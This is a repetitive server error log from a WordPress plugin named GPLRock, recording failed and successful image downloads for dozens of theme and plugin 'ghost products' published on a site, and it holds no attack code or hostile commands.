https://meldwp.com/wp-content/uploads/katerio---magazine--blog-wordpress-theme-19005.webp for product katerio-magazine-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:22 UTC] GPLRock: Image download failed for product katerio-magazine-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:24 UTC] GPLRock: Image download failed for product katerio-magazine-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/katerio---magazine--blog-wordpress-theme-19005.webp for product katerio-magazine-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:26 UTC] GPLRock WARNING: Image download failed for product katerio-magazine-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/katerio---magazine--blog-wordpress-theme-19005.webp [04-Apr-2026 21:20:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: katerio-magazine-blog-wordpress-theme [04-Apr-2026 21:20:26 UTC] GPLRock: Image download failed for product cholot-retirement-community-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:28 UTC] GPLRock: Image download failed for product cholot-retirement-community-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cholot---retirement-community-wordpress-theme-19519.webp for product cholot-retirement-community-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:30 UTC] GPLRock: Image download failed for product cholot-retirement-community-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:33 UTC] GPLRock: Image download failed for product cholot-retirement-community-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cholot---retirement-community-wordpress-theme-19519.webp for product cholot-retirement-community-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:35 UTC] GPLRock WARNING: Image download failed for product cholot-retirement-community-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cholot---retirement-community-wordpress-theme-19519.webp [04-Apr-2026 21:20:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cholot-retirement-community-wordpress-theme [04-Apr-2026 21:20:35 UTC] GPLRock: Image download failed for product luxria-modern-jewelry-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:37 UTC] GPLRock: Image download failed for product luxria-modern-jewelry-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxria---modern-jewelry-store-wordpress-theme-8602.webp for product luxria-modern-jewelry-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:39 UTC] GPLRock: Image download failed for product luxria-modern-jewelry-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:41 UTC] GPLRock: Image download failed for product luxria-modern-jewelry-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxria---modern-jewelry-store-wordpress-theme-8602.webp for product luxria-modern-jewelry-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:43 UTC] GPLRock WARNING: Image download failed for product luxria-modern-jewelry-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luxria---modern-jewelry-store-wordpress-theme-8602.webp [04-Apr-2026 21:20:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxria-modern-jewelry-store-wordpress-theme [04-Apr-2026 21:20:44 UTC] GPLRock: Image download failed for product veen-minimal-lightweight-amp-blog-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:46 UTC] GPLRock: Image download failed for product veen-minimal-lightweight-amp-blog-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veen---minimal-lightweight-amp-blog-for-wordpress-3576.webp for product veen-minimal-lightweight-amp-blog-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:48 UTC] GPLRock: Image download failed for product veen-minimal-lightweight-amp-blog-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:50 UTC] GPLRock: Image download failed for product veen-minimal-lightweight-amp-blog-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/veen---minimal-lightweight-amp-blog-for-wordpress-3576.webp for product veen-minimal-lightweight-amp-blog-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:52 UTC] GPLRock WARNING: Image download failed for product veen-minimal-lightweight-amp-blog-for-wordpress. URL: https://meldwp.com/wp-content/uploads/veen---minimal-lightweight-amp-blog-for-wordpress-3576.webp [04-Apr-2026 21:20:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: veen-minimal-lightweight-amp-blog-for-wordpress [04-Apr-2026 21:20:52 UTC] GPLRock: Image download failed for product lambda-premium-moodle-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:54 UTC] GPLRock: Image download failed for product lambda-premium-moodle-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lambda---premium-moodle-theme-248.webp for product lambda-premium-moodle-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:20:57 UTC] GPLRock: Image download failed for product lambda-premium-moodle-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:20:59 UTC] GPLRock: Image download failed for product lambda-premium-moodle-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lambda---premium-moodle-theme-248.webp for product lambda-premium-moodle-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:01 UTC] GPLRock WARNING: Image download failed for product lambda-premium-moodle-theme. URL: https://meldwp.com/wp-content/uploads/lambda---premium-moodle-theme-248.webp [04-Apr-2026 21:21:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lambda-premium-moodle-theme [04-Apr-2026 21:21:13 UTC] GPLRock: Image download failed for product intech-it-solutions-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:15 UTC] GPLRock: Image download failed for product intech-it-solutions-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/intech---it-solutions-company-wordpress-theme-14262.webp for product intech-it-solutions-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:17 UTC] GPLRock: Image download failed for product intech-it-solutions-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:19 UTC] GPLRock: Image download failed for product intech-it-solutions-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/intech---it-solutions-company-wordpress-theme-14262.webp for product intech-it-solutions-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:21 UTC] GPLRock WARNING: Image download failed for product intech-it-solutions-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/intech---it-solutions-company-wordpress-theme-14262.webp [04-Apr-2026 21:21:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: intech-it-solutions-company-wordpress-theme [04-Apr-2026 21:21:21 UTC] GPLRock: Image downloaded successfully for product ditek-digital-agency-creative-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-338e78a9.webp [04-Apr-2026 21:21:21 UTC] GPLRock: Using pre-downloaded image for product ditek-digital-agency-creative-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-338e78a9.webp [04-Apr-2026 21:21:21 UTC] GPLRock: Ghost product published with image - Product ID: ditek-digital-agency-creative-portfolio-wordpress-theme [04-Apr-2026 21:21:22 UTC] GPLRock: Image download failed for product soundsphere-podcast-radio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:24 UTC] GPLRock: Image download failed for product soundsphere-podcast-radio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soundsphere---podcast--radio-wordpress-theme-20699.webp for product soundsphere-podcast-radio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:26 UTC] GPLRock: Image download failed for product soundsphere-podcast-radio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:28 UTC] GPLRock: Image download failed for product soundsphere-podcast-radio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soundsphere---podcast--radio-wordpress-theme-20699.webp for product soundsphere-podcast-radio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:30 UTC] GPLRock WARNING: Image download failed for product soundsphere-podcast-radio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/soundsphere---podcast--radio-wordpress-theme-20699.webp [04-Apr-2026 21:21:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soundsphere-podcast-radio-wordpress-theme [04-Apr-2026 21:21:30 UTC] GPLRock: Image download failed for product vogal-multipurpose-shopify-theme-os-20 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:32 UTC] GPLRock: Image download failed for product vogal-multipurpose-shopify-theme-os-20 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vogal---multipurpose-shopify-theme-os-20-27120.webp for product vogal-multipurpose-shopify-theme-os-20 after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:34 UTC] GPLRock: Image download failed for product vogal-multipurpose-shopify-theme-os-20 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:37 UTC] GPLRock: Image download failed for product vogal-multipurpose-shopify-theme-os-20 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vogal---multipurpose-shopify-theme-os-20-27120.webp for product vogal-multipurpose-shopify-theme-os-20 after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:39 UTC] GPLRock WARNING: Image download failed for product vogal-multipurpose-shopify-theme-os-20. URL: https://meldwp.com/wp-content/uploads/vogal---multipurpose-shopify-theme-os-20-27120.webp [04-Apr-2026 21:21:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vogal-multipurpose-shopify-theme-os-20 [04-Apr-2026 21:21:39 UTC] GPLRock: Image download failed for product justgive-charity-fundraising-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:41 UTC] GPLRock: Image download failed for product justgive-charity-fundraising-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/justgive---charity--fundraising-wordpress-theme-27906.webp for product justgive-charity-fundraising-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:43 UTC] GPLRock: Image download failed for product justgive-charity-fundraising-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:45 UTC] GPLRock: Image download failed for product justgive-charity-fundraising-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/justgive---charity--fundraising-wordpress-theme-27906.webp for product justgive-charity-fundraising-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:47 UTC] GPLRock WARNING: Image download failed for product justgive-charity-fundraising-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/justgive---charity--fundraising-wordpress-theme-27906.webp [04-Apr-2026 21:21:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: justgive-charity-fundraising-wordpress-theme [04-Apr-2026 21:21:48 UTC] GPLRock: Image download failed for product consulting-corporate-and-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:50 UTC] GPLRock: Image download failed for product consulting-corporate-and-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consulting---corporate-and-business-wordpress-theme-9494.webp for product consulting-corporate-and-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:52 UTC] GPLRock: Image download failed for product consulting-corporate-and-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:54 UTC] GPLRock: Image download failed for product consulting-corporate-and-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consulting---corporate-and-business-wordpress-theme-9494.webp for product consulting-corporate-and-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:21:56 UTC] GPLRock WARNING: Image download failed for product consulting-corporate-and-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/consulting---corporate-and-business-wordpress-theme-9494.webp [04-Apr-2026 21:21:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: consulting-corporate-and-business-wordpress-theme [04-Apr-2026 21:21:56 UTC] GPLRock: Image download failed for product organiko-farm-food-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:21:58 UTC] GPLRock: Image download failed for product organiko-farm-food-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organiko---farm--food-business-wordpress-theme-12003.webp for product organiko-farm-food-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:22:00 UTC] GPLRock: Image download failed for product organiko-farm-food-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:03 UTC] GPLRock: Image download failed for product organiko-farm-food-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organiko---farm--food-business-wordpress-theme-12003.webp for product organiko-farm-food-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:22:05 UTC] GPLRock WARNING: Image download failed for product organiko-farm-food-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/organiko---farm--food-business-wordpress-theme-12003.webp [04-Apr-2026 21:22:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: organiko-farm-food-business-wordpress-theme [04-Apr-2026 21:22:05 UTC] GPLRock: Image download failed for product wedding-paradise-modern-ethnic-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:07 UTC] GPLRock: Image download failed for product wedding-paradise-modern-ethnic-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wedding-paradise--modern-ethnic-responsive-wordpress-theme-18326.webp for product wedding-paradise-modern-ethnic-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:22:09 UTC] GPLRock: Image download failed for product wedding-paradise-modern-ethnic-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:11 UTC] GPLRock: Image download failed for product wedding-paradise-modern-ethnic-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wedding-paradise--modern-ethnic-responsive-wordpress-theme-18326.webp for product wedding-paradise-modern-ethnic-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:22:13 UTC] GPLRock WARNING: Image download failed for product wedding-paradise-modern-ethnic-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wedding-paradise--modern-ethnic-responsive-wordpress-theme-18326.webp [04-Apr-2026 21:22:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wedding-paradise-modern-ethnic-responsive-wordpress-theme [04-Apr-2026 21:22:13 UTC] GPLRock: Image download failed for product cliniq-doctor-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:16 UTC] GPLRock: Image download failed for product cliniq-doctor-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cliniq---doctor--medical-wordpress-theme-23963.webp for product cliniq-doctor-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:22:18 UTC] GPLRock: Image download failed for product cliniq-doctor-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:20 UTC] GPLRock: Image download failed for product cliniq-doctor-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cliniq---doctor--medical-wordpress-theme-23963.webp for product cliniq-doctor-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:22:22 UTC] GPLRock WARNING: Image download failed for product cliniq-doctor-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cliniq---doctor--medical-wordpress-theme-23963.webp [04-Apr-2026 21:22:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cliniq-doctor-medical-wordpress-theme [04-Apr-2026 21:22:22 UTC] GPLRock: Image download failed for product varse-woocommerce-ajax-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:24 UTC] GPLRock: Image download failed for product varse-woocommerce-ajax-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/varse---woocommerce-ajax-wordpress-theme-31255.webp for product varse-woocommerce-ajax-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:22:26 UTC] GPLRock: Image download failed for product varse-woocommerce-ajax-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:29 UTC] GPLRock: Image download failed for product varse-woocommerce-ajax-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:22:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/varse---woocommerce-ajax-wordpress-theme-31255.webp for product varse-woocommerce-ajax-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:22:31 UTC] GPLRock WARNING: Image download failed for product varse-woocommerce-ajax-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/varse---woocommerce-ajax-wordpress-theme-31255.webp [04-Apr-2026 21:22:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: varse-woocommerce-ajax-wordpress-theme [04-Apr-2026 21:22:44 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-user-history-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3729a1ba.jpg [04-Apr-2026 21:22:44 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-user-history-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3729a1ba.jpg [04-Apr-2026 21:22:44 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-user-history-addon [04-Apr-2026 21:22:45 UTC] GPLRock: Image downloaded successfully for product prolisting-directory-listing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-402e8f79.jpg [04-Apr-2026 21:22:45 UTC] GPLRock: Using pre-downloaded image for product prolisting-directory-listing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-402e8f79.jpg [04-Apr-2026 21:22:45 UTC] GPLRock: Ghost product published with image - Product ID: prolisting-directory-listing-wordpress-theme [04-Apr-2026 21:22:47 UTC] GPLRock: Image downloaded successfully for product greenfarm-organic-theme-for-woocommerce-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-85ed49a0.jpg [04-Apr-2026 21:22:47 UTC] GPLRock: Using pre-downloaded image for product greenfarm-organic-theme-for-woocommerce-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-85ed49a0.jpg [04-Apr-2026 21:22:47 UTC] GPLRock: Ghost product published with image - Product ID: greenfarm-organic-theme-for-woocommerce-wordpress [04-Apr-2026 21:22:49 UTC] GPLRock: Image downloaded successfully for product bambini-kindergarten-pre-school-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5903a7b6.jpg [04-Apr-2026 21:22:49 UTC] GPLRock: Using pre-downloaded image for product bambini-kindergarten-pre-school-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5903a7b6.jpg [04-Apr-2026 21:22:49 UTC] GPLRock: Ghost product published with image - Product ID: bambini-kindergarten-pre-school-theme [04-Apr-2026 21:22:51 UTC] GPLRock: Image downloaded successfully for product aleb-event-conference-onepage-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59430b37.jpg [04-Apr-2026 21:22:51 UTC] GPLRock: Using pre-downloaded image for product aleb-event-conference-onepage-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-59430b37.jpg [04-Apr-2026 21:22:51 UTC] GPLRock: Ghost product published with image - Product ID: aleb-event-conference-onepage-wordpress-theme [04-Apr-2026 21:22:52 UTC] GPLRock: Image downloaded successfully for product slant-multi-purpose-angularjs-admin-web-app-with-bootstrap (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00f7a0aa.jpg [04-Apr-2026 21:22:53 UTC] GPLRock: Using pre-downloaded image for product slant-multi-purpose-angularjs-admin-web-app-with-bootstrap: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-00f7a0aa.jpg [04-Apr-2026 21:22:53 UTC] GPLRock: Ghost product published with image - Product ID: slant-multi-purpose-angularjs-admin-web-app-with-bootstrap [04-Apr-2026 21:22:55 UTC] GPLRock: Image downloaded successfully for product apparatus-a-multi-purpose-one-page-portfolio-and-app-landing-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0137b63b.png [04-Apr-2026 21:22:55 UTC] GPLRock: Using pre-downloaded image for product apparatus-a-multi-purpose-one-page-portfolio-and-app-landing-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0137b63b.png [04-Apr-2026 21:22:55 UTC] GPLRock: Ghost product published with image - Product ID: apparatus-a-multi-purpose-one-page-portfolio-and-app-landing-theme [04-Apr-2026 21:22:56 UTC] GPLRock: Image downloaded successfully for product ampforwp-newspaper-theme-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2872a4e4.png [04-Apr-2026 21:22:56 UTC] GPLRock: Using pre-downloaded image for product ampforwp-newspaper-theme-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2872a4e4.png [04-Apr-2026 21:22:56 UTC] GPLRock: Ghost product published with image - Product ID: ampforwp-newspaper-theme-for-amp [04-Apr-2026 21:22:58 UTC] GPLRock: Image downloaded successfully for product axel-single-property-real-estate-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-86400360.jpg [04-Apr-2026 21:22:58 UTC] GPLRock: Using pre-downloaded image for product axel-single-property-real-estate-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-86400360.jpg [04-Apr-2026 21:22:58 UTC] GPLRock: Ghost product published with image - Product ID: axel-single-property-real-estate-theme [04-Apr-2026 21:23:00 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-discounts-pro-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1222c181.jpg [04-Apr-2026 21:23:00 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-discounts-pro-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1222c181.jpg [04-Apr-2026 21:23:00 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-discounts-pro-addon [04-Apr-2026 21:23:48 UTC] GPLRock: Image download failed for product craigomatic-craigslist-automatic-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:23:50 UTC] GPLRock: Image download failed for product craigomatic-craigslist-automatic-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:23:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/craigomatic---craigslist-automatic-post-generator-plugin-for-wordpress-27380.webp for product craigomatic-craigslist-automatic-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:23:52 UTC] GPLRock: Image download failed for product craigomatic-craigslist-automatic-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:23:54 UTC] GPLRock: Image download failed for product craigomatic-craigslist-automatic-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:23:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/craigomatic---craigslist-automatic-post-generator-plugin-for-wordpress-27380.webp for product craigomatic-craigslist-automatic-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:23:56 UTC] GPLRock WARNING: Image download failed for product craigomatic-craigslist-automatic-post-generator-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/craigomatic---craigslist-automatic-post-generator-plugin-for-wordpress-27380.webp [04-Apr-2026 21:23:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: craigomatic-craigslist-automatic-post-generator-plugin-for-wordpress [04-Apr-2026 21:23:57 UTC] GPLRock: Image download failed for product wpbookit-stripe-payment-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:23:59 UTC] GPLRock: Image download failed for product wpbookit-stripe-payment-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---stripe-payment-addon-17676.webp for product wpbookit-stripe-payment-addon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:01 UTC] GPLRock: Image download failed for product wpbookit-stripe-payment-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:03 UTC] GPLRock: Image download failed for product wpbookit-stripe-payment-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:24:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---stripe-payment-addon-17676.webp for product wpbookit-stripe-payment-addon after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:24:05 UTC] GPLRock WARNING: Image download failed for product wpbookit-stripe-payment-addon. URL: https://meldwp.com/wp-content/uploads/wpbookit---stripe-payment-addon-17676.webp [04-Apr-2026 21:24:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbookit-stripe-payment-addon [04-Apr-2026 21:24:05 UTC] GPLRock: Image download failed for product localcoins-ultimate-peer-to-peer-crypto-exchange-platform (attempt 1/3). HTTP Code: 526, Error: . Retrying... 